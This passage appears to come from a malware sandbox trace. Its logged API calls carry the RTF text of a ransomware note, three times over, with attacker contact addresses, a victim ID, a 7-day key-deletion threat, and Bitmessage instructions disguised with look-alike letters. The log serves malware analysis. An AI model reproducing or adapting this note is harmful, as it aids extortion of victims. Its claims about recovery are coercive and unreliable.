unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 